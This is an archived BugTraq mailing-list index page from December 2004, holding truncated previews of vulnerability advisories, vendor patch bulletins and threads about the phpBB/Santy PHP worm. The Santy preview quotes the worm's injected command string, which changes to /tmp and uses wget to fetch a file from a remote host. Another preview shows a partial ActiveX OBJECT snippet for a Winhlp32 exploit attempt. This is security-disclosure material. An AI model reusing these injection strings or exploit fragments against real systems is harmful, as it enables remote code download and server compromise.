BugTraq (Page 1403 of 1748)
Microsoft Internet Explorer SP2 Fully Automated Remote Compromise 2004-12-25
Paul (paul greyhats cjb net)


Microsoft Internet Explorer SP2 Fully Automated Remote Compromise

Dec, 21 2004

Vulnerable

----------

- Microsoft Internet Explorer 6.0

- Microsoft Windows XP Pro SP2

- Microsoft Windows XP Home SP2

Not Tested

------------------------

- Microsoft Windows 98

- Microsoft Internet

Re: New Santy-Worm attacks *all* PHP-skripts ( Santy.c ? ) 2004-12-26
K-OTiK Security (Special-Alerts k-otik com)
In-Reply-To: <Pine.LNX.4.58.0412251805110.19888 (at) loki.ct.heise (dot) de>

The kids are exploiting the php file inclusion (programming flaw), well-thought-out.

Thousands of vulnerable sites and potentially thousands of zombies...

We labelled this Santy.c (even if the only similarity with Santy lies in

New Winhlp32.exe vuln 2004-12-24
bad_son pimp it
Can this vulnerability be exploited using the HTML help ActiveX control ?

I am trying:
<OBJECT
id=winhelp
type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
codebase="hhctrl.ocx#Version=5,02,3790,1194"
width=100
height=100
>
<PARAM name="Command

CleanCache v2.19: False Sense of Security 2004-12-25
WBG Links (wbglinks gmail com)


This is a similar (if not exact) problem that I found with the program Window Washer 5.x by Web Root:

http://www.securityfocus.com/archive/1/372717

Publisher: ButtUglySoftware

Program Description: CleanCache v.2.19 will clean up your Windows computer, such as IE cache, cookies and temp dire

New Santy-Worm attacks *all* PHP-skripts 2004-12-25
Juergen Schmidt (ju heisec de)
Hello,

The new Santy version not only attacks phpBB.

It uses the Brazilian Google site to find all kinds of PHP scripts.
It parses their URLs and overwrites variables with strings like:

'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget
www.visualcoders.net/spybot.txt;...

Often enough this l

Re: phpBB Worm 2004-12-25
Zeljko Brajdic (zebrajdi inet hr)
In-Reply-To: <Pine.LNX.4.61.0412241909320.23893 (at) mailbox.prolocation (dot) net>

>Received: (qmail 11902 invoked from network); 24 Dec 2004 20:01:50 -0000

>Received: from outgoing.securityfocus.com (HELO outgoing2.securityfocus.com) (205.206.231.26)

> by mail.securityfocus.com with SMTP; 24 Dec 2004 20:

Final Call for Papers & Workshops - BCS Asia 2005 2004-12-24
Anthony.zboralski (bcs2005 bellua com)
Dear Bugtraq Readers,

Final Call for Papers & Workshops - BCS Asia 2005

I just wanted to remind you that this is your last chance to send your proposal
to cfp2005 (at) bellua (dot) com (abstract must be sent today; presentation slides
can be sent later.)

The Call for Workshops has been extended until the

XSS in yacy 0.31 2004-12-24
Donato Ferrante (fdonato autistici org)

Donato Ferrante

Application: yacy
http://www.yacy.net

Version: 0.31

Bug: cross site scripting

Date: 24-Dec-2004

Author: Donato Ferrante
e-mail: fdonato (at) autistici (dot) org
web: www.autistici.org/fdo

STG Security Advisory: [SSA-20041220-16] PHP source injection and cross-site scripting vulnerabilities in ZeroBoard 2004-12-24
advisory stgsecurity com


STG Security Advisory: [SSA-20041220-16] PHP source injection and cross-site

scripting vulnerabilities in ZeroBoard

Revision 1.2

Date Published: 2004-12-20 (KST)

Last Update: 2004-12-24

Disclosed by SSR Team (advisory (at) stgsecurity (dot) com)

Summary

=======

ZeroBoard is one of widely used web

[SECURITY] [DSA 617-1] New libtiff packages fix arbitrary code execution 2004-12-24
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 617-1 security (at) debian (dot) org
http://www.debian.org/security/ Martin Schulze
December 24th, 2004

Re: phpBB Worm 2004-12-24
steve uptime org uk (1 replies)
In-Reply-To: <20041223125859.GE3029 (at) schlund (dot) de>

>This assumes you're seeing GET-requests, but there are other ways

>(e.g. POST) to exploit such code.

Whilst I understand your point, it should be noted that this vulnerability in phpBB is susceptible only to GET-based attacks: the vulnerable dat

Re: phpBB Worm 2004-12-24
Raymond Dijkxhoorn (raymond prolocation net) (1 replies)
new phpBB worm affects 2.0.11 2004-12-24
Herman Sheremetyev (herman swebpage com)
[SECURITY] [DSA 618-1] New imlib packages fix arbitrary code execution 2004-12-24
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 618-1 security (at) debian (dot) org
http://www.debian.org/security/ Martin Schulze
December 24th, 2004

raptor's xmas pack 2004 2004-12-22
Marco Ivaldi (raptor 0xdeadbeef info)
Hello bugtraq,

For this xmas i'm releasing some of the exploits i've developed in the
last months. Nothing so fancy, but i believe i've deployed some
new/interesting techniques, specially on the Solaris/SPARC platform.

Here's the index:

raptor_chown.c local on Linux 2.6.x < 2.6.7-rc3 (CAN-2004-0

[Security Bulletin] SSRT4696 rev.0 - HP Tru64 UNIX TCP Stack Remote Denial of Service (DoS) 2004-12-23
Boren, Rich (SSRT) (rich boren hp com)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

HP SECURITY BULLETIN

HPSBTU01077 REVISION: 0

SSRT4696 rev.0 - HP Tru64 UNIX TCP Stack
Remote Denial of Service (DoS)

NOTICE:
There are no restrictions for distribution of this Bulletin
provided that it remains complete and inta

[Security Bulletin] SSRT4883 rev.3 HP-UX ftp and ftpd remote unauthorized access 2004-12-23
Boren, Rich (SSRT) (rich boren hp com)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

-----------------------------------------------------------------
**REVISED 03**
Source: HEWLETT-PACKARD COMPANY
SECURITY BULLETIN: HPSBUX0107-162
Originally issued: 19 July 2001
Last Revised: 22 December 2004
SSRT4883 ftp and ftpd remote unauth

[USN-50-1] CUPS vulnerabilities 2004-12-23
Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-50-1 December 23, 2004
cupsys vulnerabilities
CAN-2004-1125, CAN-2004-2467, CAN-2004-1268, CAN-2004-1269,
CAN-2004-1270
===========================================================

A security issue affects the

[Security Bulletin] SSRT4876 rev.0 HP Tru64 UNIX SWS (Apache) Secure Web Server Remote 2004-12-23
Boren, Rich (SSRT) (rich boren hp com)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

HP SECURITY BULLETIN

HPSBTU01106 REVISION: 0

SSRT4876 rev.0 HP Tru64 UNIX SWS (Apache) Secure Web Server Remote
Denial of Service (DoS)

NOTICE:
There are no restrictions for distribution of this Bulletin
provided that it remains c

Copyright 2010, SecurityFocus